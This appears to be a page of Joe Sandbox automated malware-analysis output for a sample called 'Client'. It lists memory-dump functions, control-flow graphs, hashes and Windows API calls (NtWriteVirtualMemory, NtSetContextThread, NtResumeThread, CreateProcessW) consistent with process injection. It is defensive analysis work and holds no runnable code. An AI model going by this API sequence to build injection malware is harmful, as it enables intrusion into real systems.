                                                  Function 0240B7B0 Relevance: 1.6, APIs: 1, Instructions: 66nativethreadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1205 240b7b0-240b84f NtCreateThreadEx 1208 240b851-240b857 1205->1208 1209 240b858-240b87d 1205->1209 1208->1209
                                                  APIs
                                                  • NtCreateThreadEx.NTDLL(?,6D71FA28,?,?,?,00000000,?,?,?,?,?), ref: 0240B842
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950989279.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2400000_Client.jbxd
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: c99153474a9a43be38393fee661f748c2ec7aee304712f46ec871d34fa3a810f
                                                  • Instruction ID: 3522e96e54aae2c54f8489b2523effedd4285e3983d7a1986d24fa0b403683dd
                                                  • Opcode Fuzzy Hash: c99153474a9a43be38393fee661f748c2ec7aee304712f46ec871d34fa3a810f
                                                  • Instruction Fuzzy Hash: FB213972D00259ABCF01DFA9C844BEEBBB5FF48214F04851AE918B3250C7759964CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0037D898 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1195 37d898-37d8e6 1197 37d8f6-37d935 NtWriteVirtualMemory 1195->1197 1198 37d8e8-37d8f4 1195->1198 1200 37d937-37d93d 1197->1200 1201 37d93e-37d963 1197->1201 1198->1197 1200->1201
                                                  APIs
                                                  • NtWriteVirtualMemory.NTDLL(?,?,00000000,?,?), ref: 0037D928
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: e4140079b0fccb128c4c25080b6c358380f401fc5787daa74a4c6d9ac6d9a195
                                                  • Instruction ID: cfe44b2c6e9f13b8b04fc4057b2068dda0f029c72177562024ad01574cb91e90
                                                  • Opcode Fuzzy Hash: e4140079b0fccb128c4c25080b6c358380f401fc5787daa74a4c6d9ac6d9a195
                                                  • Instruction Fuzzy Hash: CE2125759002489FCB10CFA9D884BDEBBF4FF48314F10892AE919A7340D778A904CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0037D398 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1213 37d398-37d42e NtProtectVirtualMemory 1216 37d437-37d45c 1213->1216 1217 37d430-37d436 1213->1217 1217->1216
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0037D421
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  • Opcode ID: 8a65ddcc4b173bdedc29d86078903a83c725768e619d9d56b835a556c969f61c
                                                  • Instruction ID: 23cb5294a7a2d053328409ae39db674f1113134967ca30ab681bd1fd19dc52de
                                                  • Opcode Fuzzy Hash: 8a65ddcc4b173bdedc29d86078903a83c725768e619d9d56b835a556c969f61c
                                                  • Instruction Fuzzy Hash: 6C2103B1D002099FCB10CFAAD984ADEFBF4FF48314F60882AE519A7340C775A904CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0037CE80 Relevance: 1.6, APIs: 1, Instructions: 61memorynativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1221 37ce80-37cf10 NtAllocateVirtualMemory 1224 37cf12-37cf18 1221->1224 1225 37cf19-37cf3e 1221->1225 1224->1225
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0037CF03
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 9c1f97fafa8341048c8362b08d644edc543a457a78e9095d8d5c74c09f3c572e
                                                  • Instruction ID: 1d82ef3c79ea9fca0cdff68f17a9f6ca1bf63c05c8be72536affe99478ea34b2
                                                  • Opcode Fuzzy Hash: 9c1f97fafa8341048c8362b08d644edc543a457a78e9095d8d5c74c09f3c572e
                                                  • Instruction Fuzzy Hash: 3A212571D002099FCB10CFA9D884ADEFBF5BF48314F10841AE519A7200C775A954CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004D33F8 Relevance: 1.6, APIs: 1, Instructions: 59libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1246 4d33f8-4d3482 LdrLoadDll 1249 4d348b-4d34b0 1246->1249 1250 4d3484-4d348a 1246->1250 1250->1249
                                                  APIs
                                                  • LdrLoadDll.NTDLL(?,?,?,?), ref: 004D3475
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949869344.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4d0000_Client.jbxd
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: b1440f9cdcd3edaeba8b8627bf896f99531d05d1db7f5b08cb5a9e470ab6f09d
                                                  • Instruction ID: b9fec98fc1192a7b5f68bd6673e60e9675f17b6c446c09c77841ed94cdc5c14a
                                                  • Opcode Fuzzy Hash: b1440f9cdcd3edaeba8b8627bf896f99531d05d1db7f5b08cb5a9e470ab6f09d
                                                  • Instruction Fuzzy Hash: 722107B1D002089FCB10DFA9D884BDEFBF4BF48314F50892AE519A7340C778A944CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00322540 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1229 322540-3225c9 NtQuerySystemInformation 1233 3225d2-3225f7 1229->1233 1234 3225cb-3225d1 1229->1234 1234->1233
                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003225BC
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystem
                                                  • String ID:
                                                  • API String ID: 3562636166-0
                                                  • Opcode ID: 9472b4700be2db3f49c5034473cbbaaaa1f00f9570c26a5a17bf4a0b7a1c95b7
                                                  • Instruction ID: c9481f0d117b029a5a505e036a4ed5c37a248b201dd8830e4b6ff715fcab16f8
                                                  • Opcode Fuzzy Hash: 9472b4700be2db3f49c5034473cbbaaaa1f00f9570c26a5a17bf4a0b7a1c95b7
                                                  • Instruction Fuzzy Hash: 63211575D042089ECB10DFAAD884BEFFBF4AF89324F14891AD519A7240C7759A44CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0240B2E0 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0240B357
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950989279.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2400000_Client.jbxd
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: 7eb5e8ee77a7f4769965c92fa621f7f2081b2839971a5436b3d15077e7a5fb48
                                                  • Instruction ID: f4d29e0343a2637a49e73f8a96d490aa579afc53bd2cfdb847e0263d97e31f73
                                                  • Opcode Fuzzy Hash: 7eb5e8ee77a7f4769965c92fa621f7f2081b2839971a5436b3d15077e7a5fb48
                                                  • Instruction Fuzzy Hash: 19212771D042099FCB10DFAAD884BDFFBF4EF48224F14882AD519A7250C775A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00322548 Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003225BC
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystem
                                                  • String ID:
                                                  • API String ID: 3562636166-0
                                                  • Opcode ID: 14a11286ff351d4479d0eccfe797034d26f935459180b81c3a49f5c257121cb0
                                                  • Instruction ID: 71e4e461419c4d995621e58eee3463da9d80d0137b4905a4d463ea482189c2e6
                                                  • Opcode Fuzzy Hash: 14a11286ff351d4479d0eccfe797034d26f935459180b81c3a49f5c257121cb0
                                                  • Instruction Fuzzy Hash: 8F113671D042089FCB10DFAAD848BEFFBF4AF49324F14882AD519A7240C774A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0037F248 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtResumeThread.NTDLL(?,?), ref: 0037F2B6
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 72523f57d7c7de1ff9b300c6373d3b0c3d9053355922708e58d51d855330ccc5
                                                  • Instruction ID: 7d0aceebc6a2d618a0566771e85e898b8bee0850288954ec003e824da3f68b5f
                                                  • Opcode Fuzzy Hash: 72523f57d7c7de1ff9b300c6373d3b0c3d9053355922708e58d51d855330ccc5
                                                  • Instruction Fuzzy Hash: 311117B5D042098EDB10DFAAD84879FFBF4BF49224F51892AD519B7340DB78A904CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0037DD98 Relevance: 1.6, APIs: 1, Instructions: 50nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetContextThread.NTDLL(?,?), ref: 0037DDFD
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: 6334822a8c5617ed43f95b20bfa7401ff5ab836b5864b9cf5823ecc92c381f82
                                                  • Instruction ID: f743c224d86d7a44416fe38c1a731dd1633912cb615f867e7525b108f8b11ae2
                                                  • Opcode Fuzzy Hash: 6334822a8c5617ed43f95b20bfa7401ff5ab836b5864b9cf5823ecc92c381f82
                                                  • Instruction Fuzzy Hash: 111128719042088BDB20DFA9D8497DFFBF5AF89324F15881AD519B7340CB79A944CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004A0178 Relevance: 1.5, APIs: 1, Instructions: 49nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949806309.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4a0000_Client.jbxd
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: bb6608b5b66d3660c4dfa410be2c4f4ea754efbb760eafd2ef1f0586c0e5566c
                                                  • Instruction ID: a8d0f5aeca7af8a5b221495a8b32772812c14f7d51e53a1fd8eda0f249e60e76
                                                  • Opcode Fuzzy Hash: bb6608b5b66d3660c4dfa410be2c4f4ea754efbb760eafd2ef1f0586c0e5566c
                                                  • Instruction Fuzzy Hash: 431128719042098BDB10DFA9D8497DFFBF4AF89324F14881AD519B7340CB79A944CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003236C0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ffff
                                                  • API String ID: 0-3827681309
                                                  • Opcode ID: 19ae5cfa208459f9feb9dfe356ebccde0b37977afaa91efc202ee006e735207e
                                                  • Instruction ID: 1c2dce31e95df97f7410d828e94ad25d290c5fa1f28fd1dff56d83ef2d52e368
                                                  • Opcode Fuzzy Hash: 19ae5cfa208459f9feb9dfe356ebccde0b37977afaa91efc202ee006e735207e
                                                  • Instruction Fuzzy Hash: 0491D274B143159FCB05DFA4E8989AEBBB6FF88310F148529E501EB351DB70AD09CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00324B61 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54824909f8cfd2cdd4b70e9447c5a7392958e5044ff993acd13028575c138b4f
                                                  • Instruction ID: c891ff62235fbbbaad13db61b5395402e522ab9e1a681297bcc777dbc6deb386
                                                  • Opcode Fuzzy Hash: 54824909f8cfd2cdd4b70e9447c5a7392958e5044ff993acd13028575c138b4f
                                                  • Instruction Fuzzy Hash: 1FC12934A10619DFCB15CF64D88499DFBB2FF89304B6AC655E845AB321DB71EC82CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00324B70 Relevance: .2, Instructions: 228COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12723b2508864476fbc9664a90f06b2145871ce1e9c865c76feced5e52005421
                                                  • Instruction ID: 6a7ccdc27bbd4b92d9a836a76506c99d44314eb14ca2eaa81453a1b8e8a9ae67
                                                  • Opcode Fuzzy Hash: 12723b2508864476fbc9664a90f06b2145871ce1e9c865c76feced5e52005421
                                                  • Instruction Fuzzy Hash: 85A11834E10629DFCB15CF64D88499DFBB2FF89304B6AC655E845AB321D771E882CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0087BA28 Relevance: .2, Instructions: 175COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950546902.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_870000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c15aa229e8323d7e70d5a5e19df798a8d782817ee98ba92246313d3f9d3d7a88
                                                  • Instruction ID: e9e45c7dfed553c6926a4dc90d8b448c04c88c4d4861f30185b29d8df56aa619
                                                  • Opcode Fuzzy Hash: c15aa229e8323d7e70d5a5e19df798a8d782817ee98ba92246313d3f9d3d7a88
                                                  • Instruction Fuzzy Hash: 9051F636E041258FC714EF64C9506ADB7B3FB85328F14946AC80BEB3A9DB309E05C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00322078 Relevance: .1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3aaf152b1b0ea7dfd14548072655a3e27f50526657b6ed7d6ab98e63825763e7
                                                  • Instruction ID: ff73b1a88a0824f2b1948b16c27b4e3b20920286e109c8d55a5a90902ea61049
                                                  • Opcode Fuzzy Hash: 3aaf152b1b0ea7dfd14548072655a3e27f50526657b6ed7d6ab98e63825763e7
                                                  • Instruction Fuzzy Hash: D4414971A0C2D55FC703DF749C605AB7FB29F93304B6495DBC0809F6A7CA20990AC791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04E7CF70 Relevance: 6.9, Strings: 4, Instructions: 1895COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @~4$@~4$\}4$\}4
                                                  • API String ID: 0-649672702
                                                  • Opcode ID: e8ccb95f50abc627657bf6a794040a4fe210e1134c7c63899a8eadbabb0653d7
                                                  • Instruction ID: 761f077ca4f9fdd810131dc63f43f764b9eff7eec1846d5b51db87f857668f58
                                                  • Opcode Fuzzy Hash: e8ccb95f50abc627657bf6a794040a4fe210e1134c7c63899a8eadbabb0653d7
                                                  • Instruction Fuzzy Hash: 800321B4E002168FC750EF74D98CB9DB7F5AB48348F1054AA981DE3B59DB386E448F62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0037EA88 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1036 37ea88-37eb1d 1038 37eb1f-37eb25 1036->1038 1039 37eb28-37eb2f 1036->1039 1038->1039 1040 37eb31-37eb37 1039->1040 1041 37eb3a-37ebb0 1039->1041 1040->1041 1044 37ebb2-37ebbc 1041->1044 1045 37ebe9-37ecb1 CreateProcessW 1041->1045 1044->1045 1046 37ebbe-37ebc0 1044->1046 1055 37ecb3-37ecb9 1045->1055 1056 37ecba-37ed95 1045->1056 1047 37ebe3-37ebe6 1046->1047 1048 37ebc2-37ebcc 1046->1048 1047->1045 1050 37ebd0-37ebdf 1048->1050 1051 37ebce 1048->1051 1050->1050 1052 37ebe1 1050->1052 1051->1050 1052->1047 1055->1056 1067 37ed97-37ed9a 1056->1067 1068 37eda4-37eda8 1056->1068 1067->1068 1069 37edb7-37edbb 1068->1069 1070 37edaa-37edad 1068->1070 1071 37edbd-37edc1 1069->1071 1072 37edcb-37edcf 1069->1072 1070->1069 1071->1072 1073 37edc3 1071->1073 1074 37ede1-37ede5 1072->1074 1075 37edd1-37edd7 1072->1075 1073->1072 1076 37ede7-37edf3 1074->1076 1077 37edf6 1074->1077 1075->1074 1076->1077
                                                  APIs
                                                  • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0037EC9E
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 5540fd5f6189b4151f03acc993bbcc3cd78d41734738554e916521994b0bb77c
                                                  • Instruction ID: 2ff148053f27b607dc3e1a8b52b84c9e5a688a23b896d141a70a41387aa93cfb
                                                  • Opcode Fuzzy Hash: 5540fd5f6189b4151f03acc993bbcc3cd78d41734738554e916521994b0bb77c
                                                  • Instruction Fuzzy Hash: 42A16971D006198FCF21CFA9CD446DDBBB2BF48304F2585A9D909BB240DB746A89CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00322A98 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1238 322a98-322b19 VirtualProtect 1241 322b22-322b52 1238->1241 1242 322b1b-322b21 1238->1242 1242->1241
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00322B0C
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 8cb93ca4ed6f706c5c14272f4ea5bd0370f0d4fa147d0b252b6226b1fedd52e7
                                                  • Instruction ID: 101c16c4ed6328fe1ba28988d67901faf83db70624b6e5fa559a1b59c65781a6
                                                  • Opcode Fuzzy Hash: 8cb93ca4ed6f706c5c14272f4ea5bd0370f0d4fa147d0b252b6226b1fedd52e7
                                                  • Instruction Fuzzy Hash: 48211571D042099FDB10DFAAD844BEFFBF4EF88324F55882AD519A7240D778A944CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004A3780 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocExNuma.KERNELBASE(?,00000000,?,?,?,?), ref: 004A37F1
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949806309.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4a0000_Client.jbxd
                                                  Similarity
                                                  • API ID: AllocNumaVirtual
                                                  • String ID:
                                                  • API String ID: 4233825816-0
                                                  • Opcode ID: 8cf6894fd1e1be2a065786fa591053424faf415eeeca5e95c6fbe6cafcb67cbc
                                                  • Instruction ID: d6e06dd35f1b6dbb920053acbbac46b70e86f7426ea586531836ca39493887b9
                                                  • Opcode Fuzzy Hash: 8cf6894fd1e1be2a065786fa591053424faf415eeeca5e95c6fbe6cafcb67cbc
                                                  • Instruction Fuzzy Hash: 871189719002089FCB10CFA9C808BDFBFF5AF49324F10881AE515A7240C779A914CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00322788 Relevance: 1.3, APIs: 1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: 18d6a1531d061ec553532c03603bdb69890b8605ca7ccd0257636326f9de8f3d
                                                  • Instruction ID: e992969cfdbbe6d1f03427b7e892ec88cb6541ffefac9b68ca783f52f898447b
                                                  • Opcode Fuzzy Hash: 18d6a1531d061ec553532c03603bdb69890b8605ca7ccd0257636326f9de8f3d
                                                  • Instruction Fuzzy Hash: 50117C75C042498FDB10CFA9D8497EFBBF0AF88324F158829C559B7340C778AA44CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00322790 Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: 1fcd20eab5769a00969dc562a616195de06422b0f411b3c6a45b48cc9965a998
                                                  • Instruction ID: a7b41fec961007b3b80d45126e050def638fc8f05ebbebdcdeaf99a95fdce0de
                                                  • Opcode Fuzzy Hash: 1fcd20eab5769a00969dc562a616195de06422b0f411b3c6a45b48cc9965a998
                                                  • Instruction Fuzzy Hash: 2E115B719042498FDB10DFA9D8497EFFBF4AF88224F158829C519A7340DB78A944CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04E60048 Relevance: .2, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a6ebf76ad99bc95e3cad1529bba98e88682ee1d765ea0163f2d9e8a63786fd3
                                                  • Instruction ID: db00aafd562f861542900ae5a6f73edca2eadc03949b9072d7eeac47a395fedb
                                                  • Opcode Fuzzy Hash: 9a6ebf76ad99bc95e3cad1529bba98e88682ee1d765ea0163f2d9e8a63786fd3
                                                  • Instruction Fuzzy Hash: 9D915CB1F006288BEB29CE1DCDD06ACF7B5BB58241F4851ACD51AA7315E6345F89CF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04E616D0 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b567cf89560d81dc7f1d2b0c8d1facffe998c812319dca60d1f8bfac72bd8ae9
                                                  • Instruction ID: 2c8a2195d20092d3d01df16e2f4b48a564b08ac98ccc59840cca7960a7adef75
                                                  • Opcode Fuzzy Hash: b567cf89560d81dc7f1d2b0c8d1facffe998c812319dca60d1f8bfac72bd8ae9
                                                  • Instruction Fuzzy Hash: 1F411DB1F006288BDB2DCE1DCDD06ACB7B5BB58245F4882ACC51A9B356D6345F8DCB14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003602B8 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949644804.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_360000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6260437a91e088dda03dc627915f5fd00f854671f8ab8bd1437e56e46fa17855
                                                  • Instruction ID: 855e14be79dd0a9433205a75671284d99da7b1c577b3494d369c101362810bc3
                                                  • Opcode Fuzzy Hash: 6260437a91e088dda03dc627915f5fd00f854671f8ab8bd1437e56e46fa17855
                                                  • Instruction Fuzzy Hash: E501F574B081049FD3089B69EC5499B7BEBFBC5354725E87AD00ADBB9CCB31AC018750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00365E30 Relevance: .1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949644804.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
